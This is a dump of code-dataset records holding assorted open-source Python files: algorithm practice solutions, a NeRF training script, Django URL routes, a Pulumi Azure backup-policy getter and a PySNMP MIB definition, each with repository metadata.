f88454fa9aec4c56926c2ca6e93a4e29b4d5ed11 | 2c32cf726e111b8625265c458feeaea436652e83 | /pramp-condility-3month/mid-ll-03.py | 1e8be57a8c2ad51d2eaf8186bda15d8dd284e8ed | [] | no_license | minhthe/practice-algorithms-and-data-structures | 6fa3bf98e8e2fe98f4e32419fb797b1df4400364 | 488a82dd3a0c797859a6c9e1195d6d579d676073 | refs/heads/master | 2021-05-16T23:01:20.026475 | 2020-09-23T04:17:13 | 2020-09-23T04:17:13 | 250,505,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 281 | py | '''https://leetcode.com/problems/middle-of-the-linked-list/'''
class Solution:
    def middleNode(self, head: ListNode) -> ListNode:
        # standard fast/slow walk: fast advances two nodes per slow node, so slow
        # sits on the middle (the second middle for even lengths) when fast runs out
        slow = head
        fast = head
        while fast and fast.next:
            slow = slow.next
            fast = fast.next.next
        return slow
| [
"[email protected]"
] | |
1bfe256e98b3819a009084e61cbab623b1b98742 | 2a68b03c923119cc747c4ffcc244477be35134bb | /Algorithm/BFS/cutOffTreesForGolf.py | 2a98a13b8ff88d702b43e4e35845dcc69aa477f3 | [] | no_license | QitaoXu/Lintcode | 0bce9ae15fdd4af1cac376c0bea4465ae5ea6747 | fe411a0590ada6a1a6ae1166c86c585416ac8cda | refs/heads/master | 2020-04-24T20:53:27.258876 | 2019-09-24T23:54:59 | 2019-09-24T23:54:59 | 172,259,064 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,554 | py | from collections import deque
DIRECTIONS = [(-1, 0), (1, 0), (0, 1), (0, -1)]
class Node:
def __init__(self, x, y, h):
self.x = x
self.y = y
self.h = h
def __lt__(self, other):
return self.h < other.h
class Solution:
"""
@param forest: a list of integers
@return: return a integer
"""
def cutOffTree(self, forest):
# write your code here
if not forest or not forest[0]:
return 0
m, n = len(forest), len(forest[0])
trees = []
for i in range(m):
for j in range(n):
if forest[i][j] > 1:
trees.append(Node(i, j, forest[i][j]))
trees.sort()
total = 0
start = Node(0, 0, forest[0][0])
while trees:
tree = trees[0]
del trees[0]
step = self.minStep(forest, start, tree, m, n)
if step < 0:
return -1
total += step
start = tree
return total
def minStep(self, forest, start, tree, m, n):
queue = deque()
seen = set()
queue.append(start)
seen.add((start.x, start.y))
step = -1
while queue:
size = len(queue)
step += 1
for _ in range(size):
node = queue.popleft()
if node.x == tree.x and node.y == tree.y:
return step
for dx, dy in DIRECTIONS:
nx, ny = node.x + dx, node.y + dy
if not self.is_valid(forest, nx, ny):
continue
if (nx, ny) in seen:
continue
queue.append(Node(nx, ny, forest[nx][ny]))
seen.add((nx, ny))
return -1
def is_valid(self, forest, x, y):
m, n = len(forest), len(forest[0])
if x < 0 or x >= m or y < 0 or y >= n:
return False
if forest[x][y] == 0:
return False
return True
| [
"[email protected]"
] | |
c0a3e051bbc2c684475bd3bf28a5112cb6f2f3d3 | 4ccd7bab3b9491426300d9714330ad58f65fab68 | /Train/train.py | f9f4c923c120389b2dc08391d660292b893e70f9 | [] | no_license | jcn16/nert | 48ebcb3fb64bb2913ab20f85f9b8ab3ae00f4731 | 3b6e9d85e77077d1ad3b669fe88799d6a19e6d99 | refs/heads/main | 2023-06-06T11:31:21.520886 | 2021-06-20T08:33:36 | 2021-06-20T08:33:36 | 378,593,994 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,813 | py | import os, sys
from opt import get_opts
from tqdm import tqdm
from torch.utils.data import DataLoader
from datasets import dataset_dict
# models
from models.nerf import Embedding, NeRF,NeRF_sigma,NeRF_albedo
from models.rendering_part import render_rays
from losses import MSELoss
from collections import defaultdict
# metrics
from metrics import *
from utils import visualize_depth
from termcolor import colored
from tensorboardX import SummaryWriter
from checkpoints import CheckpointIO
os.environ['CUDA_VISIBLE_DEVICES']='0,1'
hparams = get_opts()
#Loading Dataset
print(colored('Loading Dataset','red'))
dataset = dataset_dict[hparams.dataset_name]
kwargs = {'root_dir': hparams.root_dir,
'img_wh': tuple(hparams.img_wh)}
train_dataset = dataset(split='train', **kwargs)
val_dataset = dataset(split='val', **kwargs)
train_data_loader=DataLoader(train_dataset,
shuffle=True,
num_workers=4,
batch_size=hparams.batch_size,
pin_memory=True)
val_data_loader=DataLoader(val_dataset,
shuffle=False,
num_workers=4,
batch_size=1, # validate one image (H*W rays) at a time
pin_memory=True)
val_iter=iter(val_data_loader)
# Loading Loss
mse_loss=MSELoss()
#Loading Network
print(colored('Loading Network','red'))
corase_Nerf_sigma=NeRF_sigma().cuda()
corase_Nerf_sigma=torch.nn.DataParallel(corase_Nerf_sigma)
corase_Nerf_albedo=NeRF_albedo().cuda()
corase_Nerf_albedo=torch.nn.DataParallel(corase_Nerf_albedo)
fine_Nerf_sigma=NeRF_sigma().cuda()
fine_Nerf_sigma=torch.nn.DataParallel(fine_Nerf_sigma)
fine_Nerf_albedo=NeRF_albedo().cuda()
fine_Nerf_albedo=torch.nn.DataParallel(fine_Nerf_albedo)
try:
corase_Nerf_sigma.load_state_dict(torch.load('/home/jcn/桌面/Nerf/nerf_my/checkpoints/corase_sigma_0.pt'))
corase_Nerf_albedo.load_state_dict(torch.load('/home/jcn/桌面/Nerf/nerf_my/checkpoints/corase_albedo_0.pt'))
fine_Nerf_sigma.load_state_dict(torch.load('/home/jcn/桌面/Nerf/nerf_my/checkpoints/fine_sigma_0.pt'))
fine_Nerf_albedo.load_state_dict(torch.load('/home/jcn/桌面/Nerf/nerf_my/checkpoints/fine_albedo_0.pt'))
print('Continue Training ...')
except:
print('Start New Trainging ..')
embedding_xyz = Embedding(3, 10).cuda() # 10 is the default number
embedding_xyz= torch.nn.DataParallel(embedding_xyz)
embedding_dir = Embedding(3, 4).cuda() # 4 is the default number
embedding_dir=torch.nn.DataParallel(embedding_dir)
o_shared=torch.optim.Adam([
{
"params": corase_Nerf_sigma.parameters(),
"lr": 5e-4,
},
{
"params": corase_Nerf_albedo.parameters(),
"lr": 5e-4,
},
{
"params": fine_Nerf_sigma.parameters(),
"lr": 5e-4,
},
{
"params": fine_Nerf_albedo.parameters(),
"lr": 5e-4,
}
])
#Loading Checkpoints
if not os.path.exists(hparams.check_dir):
os.makedirs(hparams.check_dir)
logger=SummaryWriter(os.path.join(hparams.check_dir, 'logs'))
checkpoints_io=CheckpointIO(hparams.check_dir,
corase_Nerf_sigma=corase_Nerf_sigma,
corase_Nerf_albedo=corase_Nerf_albedo,
fine_Nerf_sigma=fine_Nerf_sigma,
fine_Nerf_albedo=fine_Nerf_albedo,
optimizer=o_shared)
try:
load_dict=checkpoints_io.load('model_latest.pt')
except FileExistsError:
load_dict=dict()
start_epoch=load_dict.get('epoch_it',0)
it=load_dict.get('it',0)
#Start Training
print(colored('Start Training','blue'))
print('total data=',len(train_dataset))
iter_number = int(len(train_dataset) / hparams.batch_size)
print('val data per ', iter_number)
for epoch in range(100):
epoch=epoch+start_epoch
pbar = tqdm(total=iter_number)
#all losse
print('New Epoch!')
for batch in train_data_loader:
pbar.update(1)
it += 1
corase_Nerf_sigma.train()
corase_Nerf_albedo.train()
fine_Nerf_sigma.train()
fine_Nerf_albedo.train()
rays=batch['rays'].cuda()
rgbs=batch['rgbs'].cuda()
embeddings = [embedding_xyz, embedding_dir]
results=render_rays(corase_Nerf_sigma,corase_Nerf_albedo,fine_Nerf_sigma,fine_Nerf_albedo,
embeddings,rays,
hparams.N_samples,
hparams.use_disp,
hparams.perturb,
hparams.noise_std,
hparams.N_importance,
hparams.chunk, # chunk size is effective in val mode
train_dataset.white_back
)
loss=mse_loss(results,rgbs)
loss=loss.mean()
psnr_=psnr(results['rgb_fine'],rgbs)
psnr_=psnr_.mean()
o_shared.zero_grad()
loss.backward()
o_shared.step()
logger.add_scalar('train/loss', loss, it)
logger.add_scalar('train/psnr', psnr_, it)
if it%hparams.step==0:
print("save models")
base_path = hparams.check_dir
model_path = os.path.join(base_path, 'corase_sigma_%d.pt' % epoch)
torch.save(corase_Nerf_sigma.state_dict(), model_path)
model_path = os.path.join(base_path, 'corase_albedo_%d.pt' % epoch)
torch.save(corase_Nerf_albedo.state_dict(), model_path)
model_path = os.path.join(base_path, 'fine_sigma_%d.pt' % epoch)
torch.save(fine_Nerf_sigma.state_dict(), model_path)
model_path = os.path.join(base_path, 'fine_albedo_%d.pt' % epoch)
torch.save(fine_Nerf_albedo.state_dict(), model_path)
for n in range(8):
try:
val_batch = val_iter.__next__()
except StopIteration:
val_iter = iter(val_data_loader)
val_batch = val_iter.__next__()
with torch.no_grad():
corase_Nerf_sigma.eval()
corase_Nerf_albedo.eval()
fine_Nerf_sigma.eval()
fine_Nerf_albedo.eval()
rays = val_batch['rays'].cuda()
rays =rays.squeeze()
rgbs = val_batch['rgbs'].cuda()
rgbs=rgbs.squeeze()
B,_=rays.shape
embeddings = [embedding_xyz, embedding_dir]
results = defaultdict(list)
for i in range(0, B, hparams.chunk):
rendered_ray_chunks = \
render_rays(corase_Nerf_sigma, corase_Nerf_albedo, fine_Nerf_sigma, fine_Nerf_albedo,
embeddings, rays[i:i+hparams.chunk],
hparams.N_samples,
hparams.use_disp,
hparams.perturb,
hparams.noise_std,
hparams.N_importance,
hparams.chunk, # chunk size is effective in val mode
train_dataset.white_back
)
for k, v in rendered_ray_chunks.items():
results[k] += [v]
for k, v in results.items():
results[k] = torch.cat(v, 0)
val_loss=mse_loss(results,rgbs)
val_loss=val_loss.mean()
psnr_ = psnr(results['rgb_fine'], rgbs)
psnr_ = psnr_.mean()
W, H = hparams.img_wh
img = results['rgb_fine'].view(H, W, 3).cpu()
img = img.permute(2, 0, 1) # (3, H, W)
img_gt = rgbs.view(H, W, 3).permute(2, 0, 1).cpu() # (3, H, W)
depth = visualize_depth(results['depth_fine'].view(H, W)) # (3, H, W)
show_img = torch.cat([img_gt,img,depth], 2)
show_img=show_img*255
logger.add_image('val/show_images_%d' % n, show_img.byte(), epoch)
                logger.add_scalar('val/loss', val_loss, epoch)
                logger.add_scalar('val/psnr', psnr_, epoch)
print("save models")
base_path = hparams.check_dir
model_path = os.path.join(base_path,'corase_sigma_%d.pt' % epoch)
torch.save(corase_Nerf_sigma.state_dict(), model_path)
model_path = os.path.join(base_path, 'corase_albedo_%d.pt' % epoch)
torch.save(corase_Nerf_albedo.state_dict(), model_path)
model_path = os.path.join(base_path, 'fine_sigma_%d.pt' % epoch)
torch.save(fine_Nerf_sigma.state_dict(), model_path)
model_path = os.path.join(base_path, 'fine_albedo_%d.pt' % epoch)
torch.save(fine_Nerf_albedo.state_dict(), model_path)
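# --- illustrative launch sketch (added) ---
# The exact flag names live in opt.py (not shown); those used above include
# dataset_name, root_dir, img_wh, batch_size and check_dir, so a run
# presumably looks something like:
#   python train.py --dataset_name blender --root_dir /path/to/scene \
#       --img_wh 400 400 --batch_size 1024 --check_dir ./checkpoints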
| [
"[email protected]"
] | |
bb66bf071a75efcfd3911bfff82f02abb6f859f3 | d8183ea32f7e041dc4094cb955c075586bf66b73 | /subscriptions/api/urls.py | b63a5e68b48dfb2f6ec1e280cb64cdad63d00b63 | [
"BSD-2-Clause"
] | permissive | mjumbewu/django-subscriptions | e8426ff510f06268c3f4151e7d71ffad59fa115b | 78a35742ec5062380aded053b64fd96cba677dac | refs/heads/master | 2016-09-05T18:03:22.761915 | 2013-04-01T18:05:08 | 2013-04-01T18:05:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from django.conf.urls.defaults import patterns, include, url
from subscriptions.api.views import SubscriptionIndex, ContentFeedRecordIndex
urlpatterns = patterns('',
url('^subscriptions/$', SubscriptionIndex.as_view()),
url('^feed_records/$', ContentFeedRecordIndex.as_view()),
)
| [
"[email protected]"
] | |
9cdaad47d5357ac4e8efec69e5a276d9740b076e | c77a40408bc40dc88c466c99ab0f3522e6897b6a | /Python_fundamentals/Lists_basics/InvertValues.py | 4f376e4458c8f0257c55551b39bf912e393e5243 | [] | no_license | vbukovska/SoftUni | 3fe566d8e9959d390a61a4845381831929f7d6a3 | 9efd0101ae496290313a7d3b9773fd5111c5c9df | refs/heads/main | 2023-03-09T17:47:20.642393 | 2020-12-12T22:14:27 | 2021-02-16T22:14:37 | 328,805,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | string = input()
list_of_string = string.split(' ')
reverse_list = []
for i in range(len(list_of_string)):
reverse_list.append(int(list_of_string[i]) * -1)
print(reverse_list)
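# A compact alternative sketch (added): the same inversion as a one-liner.
# print([-int(x) for x in input().split(' ')])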
| [
"[email protected]"
] | |
508adf8642b9920d2152095cd5a761b3ab2e54c0 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /sdk/python/pulumi_azure_native/recoveryservices/v20210201/get_protection_policy.py | ecf4c141423f4c2b9f265781df528fc03ccf1e76 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bpkgoud/pulumi-azure-native | 0817502630062efbc35134410c4a784b61a4736d | a3215fe1b87fba69294f248017b1591767c2b96c | refs/heads/master | 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,829 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetProtectionPolicyResult',
'AwaitableGetProtectionPolicyResult',
'get_protection_policy',
'get_protection_policy_output',
]
@pulumi.output_type
class GetProtectionPolicyResult:
"""
Base class for backup policy. Workload-specific backup policies are derived from this class.
"""
def __init__(__self__, e_tag=None, id=None, location=None, name=None, properties=None, tags=None, type=None):
if e_tag and not isinstance(e_tag, str):
raise TypeError("Expected argument 'e_tag' to be a str")
pulumi.set(__self__, "e_tag", e_tag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="eTag")
def e_tag(self) -> Optional[str]:
"""
Optional ETag.
"""
return pulumi.get(self, "e_tag")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id represents the complete path to the resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name associated with the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> Any:
"""
ProtectionPolicyResource properties
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type represents the complete path of the form Namespace/ResourceType/ResourceType/...
"""
return pulumi.get(self, "type")
class AwaitableGetProtectionPolicyResult(GetProtectionPolicyResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetProtectionPolicyResult(
e_tag=self.e_tag,
id=self.id,
location=self.location,
name=self.name,
properties=self.properties,
tags=self.tags,
type=self.type)
def get_protection_policy(policy_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
vault_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetProtectionPolicyResult:
"""
Base class for backup policy. Workload-specific backup policies are derived from this class.
:param str policy_name: Backup policy information to be fetched.
:param str resource_group_name: The name of the resource group where the recovery services vault is present.
:param str vault_name: The name of the recovery services vault.
"""
__args__ = dict()
__args__['policyName'] = policy_name
__args__['resourceGroupName'] = resource_group_name
__args__['vaultName'] = vault_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:recoveryservices/v20210201:getProtectionPolicy', __args__, opts=opts, typ=GetProtectionPolicyResult).value
return AwaitableGetProtectionPolicyResult(
e_tag=__ret__.e_tag,
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
properties=__ret__.properties,
tags=__ret__.tags,
type=__ret__.type)
@_utilities.lift_output_func(get_protection_policy)
def get_protection_policy_output(policy_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
vault_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetProtectionPolicyResult]:
"""
Base class for backup policy. Workload-specific backup policies are derived from this class.
:param str policy_name: Backup policy information to be fetched.
:param str resource_group_name: The name of the resource group where the recovery services vault is present.
:param str vault_name: The name of the recovery services vault.
"""
...
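# Hedged usage sketch (argument values are illustrative placeholders, not from the SDK docs):
# result = get_protection_policy(policy_name="DailyPolicy",
#                                resource_group_name="rg-recovery",
#                                vault_name="myRecoveryVault")
# pulumi.export("protectionPolicyId", result.id)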
| [ "[email protected]" ] | |
be11b741bfcdd7a38ab0381a2686283f96a1864b | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/PCUBE-SMI.py | 057c4bae47ebfa759260a8448e4e0cd9d353529d | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 3,457 | py | #
# PySNMP MIB module PCUBE-SMI (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/PCUBE-SMI
# Produced by pysmi-0.3.4 at Wed May 1 12:11:29 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
enterprises, ObjectIdentity, iso, Counter32, Unsigned32, Counter64, Integer32, ModuleIdentity, TimeTicks, Gauge32, IpAddress, MibIdentifier, Bits, NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn = mibBuilder.importSymbols("SNMPv2-SMI", "enterprises", "ObjectIdentity", "iso", "Counter32", "Unsigned32", "Counter64", "Integer32", "ModuleIdentity", "TimeTicks", "Gauge32", "IpAddress", "MibIdentifier", "Bits", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
pcube = ModuleIdentity((1, 3, 6, 1, 4, 1, 5655))
pcube.setRevisions(('2002-01-14 20:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: pcube.setRevisionsDescriptions(('Initial version of this MIB module.',))
if mibBuilder.loadTexts: pcube.setLastUpdated('200201142000Z')
if mibBuilder.loadTexts: pcube.setOrganization('Cisco Systems, Inc.')
if mibBuilder.loadTexts: pcube.setContactInfo('Cisco Systems Customer Service Postal: 170 W Tasman Drive San Jose, CA 95134 USA Tel: +1 800 553-NETS E-mail: [email protected]')
if mibBuilder.loadTexts: pcube.setDescription('The Structure of Management Information for the Pcube enterprise.')
pcubeProducts = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 1))
if mibBuilder.loadTexts: pcubeProducts.setStatus('current')
if mibBuilder.loadTexts: pcubeProducts.setDescription('pcubeProducts is the root OBJECT IDENTIFIER from which sysObjectID values are assigned. Actual values are defined in PCUBE-PRODUCTS-MIB.')
pcubeModules = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 2))
if mibBuilder.loadTexts: pcubeModules.setStatus('current')
if mibBuilder.loadTexts: pcubeModules.setDescription('pcubeModules provides a root object identifier from which MODULE-IDENTITY values may be assigned.')
pcubeMgmt = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 3))
if mibBuilder.loadTexts: pcubeMgmt.setStatus('current')
if mibBuilder.loadTexts: pcubeMgmt.setDescription('pcubeMgmt is the main subtree for new MIB development.')
pcubeWorkgroup = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 4))
if mibBuilder.loadTexts: pcubeWorkgroup.setStatus('current')
if mibBuilder.loadTexts: pcubeWorkgroup.setDescription("pcubeWorkgroup is the main subtree for objects and events of P-Cube's products.")
mibBuilder.exportSymbols("PCUBE-SMI", PYSNMP_MODULE_ID=pcube, pcubeMgmt=pcubeMgmt, pcubeProducts=pcubeProducts, pcubeModules=pcubeModules, pcubeWorkgroup=pcubeWorkgroup, pcube=pcube)
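# Hedged sketch: loading this compiled module through pysnmp's SMI machinery
# (assumes 'PCUBE-SMI' is on the MibBuilder search path; illustrative only):
# from pysnmp.smi import builder
# builder.MibBuilder().loadModules('PCUBE-SMI')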
| [ "[email protected]" ] |